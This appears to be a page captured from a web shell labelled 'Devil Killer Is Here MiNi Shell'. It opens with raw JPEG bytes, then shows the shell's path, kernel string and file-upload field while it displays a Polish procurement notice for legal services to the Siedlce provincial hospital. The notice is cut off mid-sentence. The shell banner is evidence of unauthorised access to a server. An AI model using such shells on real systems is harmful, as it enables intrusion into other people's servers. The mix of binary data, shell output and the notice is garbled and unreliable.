JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250411/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250411/0018774201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług pomocy prawnej dla Mazowieckiego Szpitala Wojewódzkiego im. św. Jana Pawła II w Siedlcach Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Mazowiecki Szpital Wojewódzki mi. św. Jana Pawła II w Siedlcach Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141944750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poniatowskiego 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ozp@szpital.siedlce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">szpital.siedlce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług pomocy prawnej dla Mazowieckiego Szpitala Wojewódzkiego im. św. Jana Pawła II w Siedlcach Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a6aa582-4c46-4bde-a74d-0e9e917aa58c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00187742</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://szpitalsiedlce.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://szpitalsiedlce.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje zawiera SWZ : Dział XII. Sposób porozumiewania się Zamawiającego z Wykonawcami:</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZP.2810.32.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	W zakres przedmiotowej usługi wchodzą następujące czynności: <br/>1)	udzielanie porad i konsultacji prawnych oraz opinii prawnych w sprawach zgłaszanych przez komórki organizacyjne, w obszarach działalności Zamawiającego, obejmujących: <br/>a)	prawo dot. działalności leczniczej,<br/>b)	prawo autorskie i prawo własności przemysłowej,<br/>c)	prawo cywilne,<br/>d)	prawo administracyjne, <br/>e)	badania kliniczne,<br/>f)	prawa pacjenta,<br/>g)	pozyskiwanie funduszy europejskich; <br/>2)	opiniowanie umów z zakresu badań komercyjnych;<br/>3)	opiniowanie umów z zakresu badań klinicznych;<br/>4)	opiniowanie w zakresie obsługi kontraktów (opiniowanie, negocjowanie umów) <br/>w obszarze prawa gospodarczego i cywilnego do 130.000,00 zł, w tym:<br/>a)	umowy najmu,<br/>b)	umowy dzierżawy,<br/>c)	umowy serwisowe,<br/>d)	umowy remontu,<br/>e)	umowy o roboty budowlane,<br/>f)	umowy IT w tym umowy pilotażowe, utrzymania i wdrożenia systemów informatycznych,<br/>g)	umowy dotacyjne,<br/>h)	umowy o dzieło,<br/>i)	umowy zlecenie z personelem w tym na usługi szkoleniowe;<br/>5)	opiniowanie, udzielanie porad prawnych i konsultacji na rzecz komórek organizacyjnych Spółki: Dział Aparatury Medycznej, Dział Informatyki, Dział Eksploatacyjny, Dział Administracji i Logistyki, Dział Zamówień Publicznych i Zaopatrzenia w zakresie prowadzonych spraw;<br/>6)	wsparcie związane z formułowaniem pism i stanowisk w związku z posiadanym przez Zamawiającego mieniem;<br/>7)	sporządzanie środków zaskarżenia – zażalenia na postanowienia; skargi do WSA <br/>w zakresie prowadzonych spraw;<br/>8)	wsparcie w opracowywaniu zarządzeń, wewnętrznych regulaminów, instrukcji itp. <br/>w zakresie prowadzonych spraw; <br/>9)	udział w negocjowaniu warunków umów i porozumień zawieranych przez Zamawiającego, opiniowanie projektów tych umów i porozumień w zakresie prowadzonych spraw; <br/>10)	świadczenie pomocy prawnej w zakresie przygotowywania dokumentacji medycznej <br/>w związku z wezwaniami upoważnionych organów, instytucji i osób fizycznych; <br/>11)	doradztwo prawne w zakresie zamówień publicznych udzielanych z wyłączeniem stosowania przepisów ustawy Prawo zamówień publicznych; <br/>12)	doradztwo prawne oraz sporządzanie umów najmu, dzierżawy, leasingu, użyczenia, sprzedaży, darowizn itp. w zakresie prowadzonych spraw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <p class="mb-0">79111000-5 - Usługi w zakresie doradztwa prawnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 2<br/>1.	W zakres przedmiotowej usługi wchodzą następujące czynności: <br/>1)	udzielanie porad i konsultacji prawnych oraz opinii prawnych w sprawach zgłaszanych przez komórki organizacyjne, w obszarach działalności Zamawiającego, obejmujących: <br/>a)	prawo dot. działalności leczniczej oraz udzielania świadczeń zdrowotnych,<br/>b)	finanse publiczne,<br/>c)	prawo autorskie i prawo własności przemysłowej,<br/>d)	prawo zamówień publicznych,<br/>e)	pozyskiwanie funduszy europejskich; <br/>f) prawo cywilne,<br/>g)	prawo administracyjne, <br/>h)	prawa pacjenta,<br/>2)	świadczenie pomocy prawnej w zakresie postępowań związanych z udzielaniem zamówień publicznych, w tym:<br/>1)	pomoc w wyborze trybu, kryteriów oceny ofert, konstruowaniu postanowień umownych, wsparcie komisji przetargowej,<br/>2)	analiza dokumentacji postępowania, pomoc w formułowaniu odpowiedzi na zapytania i wezwań do wykonawców,<br/>3)	strategia działania w przypadku przysługujących wykonawcom środków odwoławczych, <br/>4)	wsparcie przy dokonywaniu czynności związanych z badaniem i oceną ofert złożonych w postępowaniu,<br/>5)	reprezentacja jako pełnomocnik przed KIO i sądem,<br/>6)	świadczenie pomocy prawnej w zakresie obsługi inwestycji i kontraktów z nimi związanych oraz opiniowanie umów, aneksów porozumień, mediacji i ugód dotyczących zamówień publicznych) powyżej 130.000,00 zł, w tym sporządzanie opinii prawnych, udzielanie porad prawnych i konsultacji na rzecz komórek organizacyjnych Szpitala, reprezentacja jako pełnomocnik, <br/>7)	analiza i pomoc w rozwiązywaniu problemów prawnych związanych z zawartymi umowami, pomoc w formułowaniu korespondencji z tym związanej i rozwiązywaniu zawartych umów;<br/>3) świadczenie pomocy prawnej w zakresie dotacji, w tym sporządzanie środków zaskarżenia – zarzuty do protokołów kontroli, odpowiedzi na wezwania, zażalenia na postanowienia; skargi do WSA/NSA;<br/>4) świadczenie pomocy prawnej w zakresie:<br/>a)	stosowania przepisów ustawy o działalności leczniczej oraz ustawy o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych, m.in. opiniowanie <br/>w zakresie kontraktowania świadczeń zdrowotnych, w tym pomoc w sporządzeniu środków zaskarżenia i pozwów; wsparcie w prowadzeniu konkursów na udzielanie świadczeń zdrowotnych, m.in. wsparcie w przygotowaniu dokumentacji konkursowej i odpowiedziach na zapytania, rozpatrywaniu zastrzeżeń i środków odwoławczych oraz pomoc w analizie ofert; <br/>b)	wydawaniu dokumentacji medycznej, <br/>c)	zawiadomień i wniosków do sądu opiekuńczego – wsparcie przy formułowaniu odpowiedzi, wniosków i zawiadomień.<br/>5) doradztwo i obsługa prawna w ramach udzielania świadczeń zdrowotnych finansowanych ze środków publicznych, zwłaszcza w zakresie: <br/>a)	zawierania kontraktów z Narodowym Funduszem Zdrowia i innymi dysponentami środków publicznych; <br/>b)	rozliczeń przeprowadzanych z Narodowym Funduszem Zdrowia, w tym znajomość uregulowań wewnętrznych wydanych przez Prezesa NFZ oraz Dyrektorów Oddziałów; <br/>c)	przeprowadzania konkursów i realizacji umów na udzielanie świadczeń zdrowotnych przez podmioty lub osoby legitymujące się nabyciem fachowych kwalifikacji do udzielania świadczeń zdrowotnych w określonym zakresie lub określonej dziedzinie medycyny, <br/>6) opiniowanie w zakresie obsługi kontraktów (opiniowanie, negocjowanie umów) w obszarze prawa gospodarczego i cywilnego powyżej 130.000,00 zł;<br/>7) sporządzanie środków zaskarżenia – zażalenia na postanowienia; skargi do WSA w zakresie prowadzonych spraw;<br/>8) wsparcie w opracowywaniu zarządzeń, wewnętrznych regulaminów, instrukcji itp. <br/>w zakresie prowadzonych spraw; <br/>9) udział w negocjowaniu warunków umów i porozumień zawieranych przez Zamawiającego, opiniowanie projektów tych umów i porozumień w zakresie prowadzonych spraw; <br/>10) świadczenie pomocy prawnej w zakresie przygotowywania dokumentacji medycznej <br/>w związku z wezwaniami upoważnionych organów, instytucji i osób fizycznych; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 3<br/><br/>1. W zakres przedmiotowej usługi wchodzą następujące czynności: <br/>1) udzielanie porad i konsultacji prawnych oraz opinii prawnych w sprawach zgłaszanych przez komórki organizacyjne, w obszarach działalności Zamawiającego, obejmujących: <br/>a)	finanse publiczne,<br/>b)	prawo spółek handlowych,<br/>c)	prawo pracy i ubezpieczeń społecznych,<br/>d)	prawo cywilne,<br/>e)	prawo administracyjne, <br/>2) opiniowanie w zakresie obsługi spółki i jej organów w obszarze prawa korporacyjnego, gospodarczego i cywilnego, w tym:<br/>a) obsługa zarządu i rady nadzorczej, w tym posiedzeń organów, <br/>b) sprawy dotyczące wpisu w Krajowym Rejestrze Sądowym,<br/>c) sprawy dotyczące udostępniania informacji publicznej,<br/>3) opiniowanie , udzielanie porad prawnych i konsultacji na rzecz komórek organizacyjnych Spółki: Dział Organizacji i Zarządzania Jakością, Dział Zarządzania Zasobami Ludzkimi;<br/>4) sporządzanie środków zaskarżenia – zażalenia na postanowienia; skargi do WSA <br/>w zakresie prowadzonych spraw;<br/>5) zastępstwa procesowe w sprawach gospodarczych, z zakresu k.s.h oraz w zakresie prawa pracy i ubezpieczeń społecznych;<br/>6) wsparcie w opracowywaniu zarządzeń, wewnętrznych regulaminów, instrukcji itp. <br/>w zakresie prowadzonych spraw; <br/>7)	udział w negocjowaniu warunków umów i porozumień zawieranych przez Zamawiającego, opiniowanie projektów tych umów i porozumień w zakresie prowadzonych spraw; <br/>8) świadczenie pomocy prawnej w zakresie przygotowywania dokumentacji medycznej <br/>w związku z wezwaniami upoważnionych organów, instytucji i osób fizycznych; <br/>9) obsługa prawna posiedzeń zarządu i rady nadzorczej,<br/>10) kompleksowe świadczenie pomocy prawnej w zakresie zadań Działu Zarządzania Zasobami Ludzkimi, w tym prawo pracy i ubezpieczeń społecznych oraz inne sprawy dotyczące zatrudnienia pracowniczego i poza pracowniczego (w tym obsługa postępowań konkursowych dotyczących udzielania świadczeń zdrowotnych przez osoby wykonujące zawód medyczny). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> b)W zakresie posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Wykonawca musi posiadać uprawnienia do świadczenia pomocy prawnej w rozumieniu ustawy z dnia 6 lipca 1982 r., o radcach prawnych lub ustawy z 26 maja 1982 r. Prawo o adwokaturze, tj. posiada tytuł zawodowy radcy prawnego lub adwokata oraz jest wpisany na właściwą listę samorządu zawodowego (aktywne uprawnienia) lub posiada tytuł prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej oraz jest wpisana na listę prawników zagranicznych prowadzoną przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych.<br/>c)W zakresie sytuacji ekonomicznej lub finansowej. <br/>Zamawiający nie precyzuje wymagań w tym zakresie.<br/>d)W zakresie zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>Warunek I<br/>(Pakiet Nr 1.) - w trakcie trwania umowy będzie dysponował co najmniej jednym wskazanym przez Wykonawcę prawnikiem posiadającym tytuł zawodowy radcy prawnego lub adwokata oraz wpisanym na właściwą listę samorządu zawodowego (aktywne uprawnienia) lub posiadającym tytuł prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej oraz wpisanym na listę prawników zagranicznych prowadzoną przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur). <br/>Do oferty wykonawca dołącza wykaz osób skierowanych do realizacji zamówienia potwierdzający posiadanie wymaganych kwalifikacji oraz dokument potwierdzający wpisanie na właściwą listę samorządu zawodowego lub dokument potwierdzający wpis na listę prawników zagranicznych prowadzony przez właściwą okręgową radę adwokacką lub radę okręgowej izby radców prawnych (w zależności od osoby pełniącej dyżur).<br/>(Pakiet Nr 2.) - w trakcie trwania umowy będzie dysponował co najmniej jednym wskazanym przez Wykonawcę profesjonalnym prawnikiem posiadającym tytuł zawodowy radcy prawnego lub adwokata oraz wpisanym na właściwą listę samorządu zawodowego lub posiadającym tytuł prawnika zagranicznego w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej oraz wpisanym na listę prawników zagranicznych prowadzoną przez 